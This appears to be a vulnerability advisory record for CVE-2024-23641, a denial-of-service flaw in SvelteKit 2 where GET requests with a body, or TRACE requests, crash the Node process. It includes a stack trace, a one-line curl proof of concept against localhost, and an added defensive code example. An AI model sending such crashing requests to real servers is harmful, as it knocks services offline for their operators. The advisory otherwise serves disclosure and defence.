CVE-2024-23641 – @sveltejs/kit
Package
Manager: npm
Name: @sveltejs/kit
Vulnerable Version: >=2.0.0 <2.4.3
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS: 0.00263 (percentile 0.49528)
Details
Sending a GET or HEAD request with a body crashes SvelteKit

### Summary

In SvelteKit 2, sending a GET request with a body (e.g. `{}`) to a SvelteKit app running under `vite preview` or with `adapter-node` throws `Request with GET/HEAD method cannot have body.` and crashes the app. The error is raised by the WHATWG `Request` constructor (Node's bundled undici) when the adapter converts the incoming Node request into a Fetch `Request`; nothing catches the `TypeError`, so the process exits:

```
node:internal/deps/undici/undici:6066
      throw new TypeError("Request with GET/HEAD method cannot have body.");
      ^

TypeError: Request with GET/HEAD method cannot have body.
    at new Request (node:internal/deps/undici/undici:6066:17)
    at getRequest (file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/node/index.js:107:9)
    at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:181:26
    at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7)
    at next (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44739:5)
    at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:172:6
    at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7)
    at next (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44739:5)
    at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:211:27
    at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7)

Node.js v20.11.0
```

`TRACE` requests will also cause the app to crash (the Fetch standard forbids that method, so the `Request` constructor rejects it the same way). Prerendered pages and SvelteKit 1 apps are not affected.

### PoC

First do a fresh install of SvelteKit 2 with the example app (TypeScript).

1. `npm run build`
2. `npm run preview`
3. Go to http://localhost:4173 (works)
4. `curl -X GET -d "{}" http://localhost:4173/bye`
5. The application crashes and http://localhost:4173 is down

### Impact

Denial of service for apps served with `adapter-node` (and for `vite preview`): a single unauthenticated, malformed request takes the whole Node process down, not just one route. Upgrade to `@sveltejs/kit` 2.4.3 or later. Because the crash is an uncaught exception rather than resource exhaustion, a process supervisor that restarts the app only converts the outage into a restart loop for as long as the attacker keeps sending the request.
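The following is an added example, not code from SvelteKit or from the advisory. It reproduces the failure mode in isolation (a GET with a body, or a TRACE, handed to the WHATWG `Request` constructor) and shows one defensive adapter-style conversion that answers the client with an error instead of letting the `TypeError` escape and terminate the process. It assumes Node 18 or later (global `Request`); the function names, the sample requests and the 400/405 status choices are this example's own and are not a description of the fix shipped in 2.4.3.

```javascript
// Added example; not SvelteKit's code. Assumes Node 18+ (global Request).

const URL_BASE = 'http://localhost:4173'; // constructed sample origin

// Methods the Fetch standard says must not carry a body.
const BODYLESS_METHODS = new Set(['GET', 'HEAD']);
// Methods the Fetch standard forbids outright; Request() rejects them.
const FORBIDDEN_METHODS = new Set(['CONNECT', 'TRACE', 'TRACK']);

// Naive adapter-style conversion: whatever the client sent goes straight into
// Request(). This is the shape that crashes: the TypeError thrown here
// propagates out of the request handler and, unhandled, ends the process.
function naiveToRequest({ method, url, headers = {}, body = null }) {
  return new Request(url, { method, headers, body });
}

// True when naiveToRequest() throws a TypeError for this input, i.e. when a
// server built that way would crash on this request.
function naiveCrashes(input) {
  try {
    naiveToRequest(input);
    return false;
  } catch (err) {
    return err instanceof TypeError;
  }
}

// Defensive conversion. Returns { request } on success, or { status, message }
// that the caller turns into an HTTP error response. The status values are
// this example's choice.
function safeToRequest({ method, url, headers = {}, body = null }) {
  const m = String(method).toUpperCase();
  if (FORBIDDEN_METHODS.has(m)) {
    return { status: 405, message: `method ${m} is not allowed` };
  }
  if (BODYLESS_METHODS.has(m) && body != null) {
    // Reject rather than silently drop the body: a GET with a payload is
    // either a broken client or a probe, and neither should be masked.
    return { status: 400, message: 'GET and HEAD requests must not have a body' };
  }
  try {
    return { request: new Request(url, { method: m, headers, body }) };
  } catch (err) {
    // Anything else the constructor rejects (invalid URL, bad header name,
    // ...) is still a client error, never a reason to take the server down.
    return { status: 400, message: err.message };
  }
}

// Constructed sample traffic: the advisory's PoC request, a TRACE, and two
// well-formed requests for contrast.
const SAMPLE_REQUESTS = [
  { method: 'GET', url: `${URL_BASE}/bye`, body: '{}' },
  { method: 'TRACE', url: `${URL_BASE}/` },
  { method: 'GET', url: `${URL_BASE}/` },
  { method: 'POST', url: `${URL_BASE}/api`, headers: { 'content-type': 'application/json' }, body: '{}' },
];

for (const sample of SAMPLE_REQUESTS) {
  const outcome = safeToRequest(sample);
  const verdict = outcome.request
    ? `accepted as ${outcome.request.method}`
    : `rejected ${outcome.status}: ${outcome.message}`;
  console.log(
    `${sample.method} ${sample.url} body=${JSON.stringify(sample.body ?? null)}` +
    ` -> naive crashes: ${naiveCrashes(sample)}; safe: ${verdict}`
  );
}
```

Run it with `node` and compare the two columns: the PoC request and the TRACE make the naive conversion throw, while the defensive one turns both into an error response and leaves the process alive. The same pattern applies to any adapter that builds a Fetch `Request` from a raw Node request: validate the method and body combination before calling the constructor, and treat everything the constructor still rejects as a client error.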
Metadata
Created: 2024-01-24T14:22:22Z
Modified: 2024-01-24T19:13:36Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-g5m6-hxpp-fc49/GHSA-g5m6-hxpp-fc49.json
CWE IDs: ["CWE-20"]
Alternative ID: GHSA-g5m6-hxpp-fc49
Finding: F184
Auto approve: 1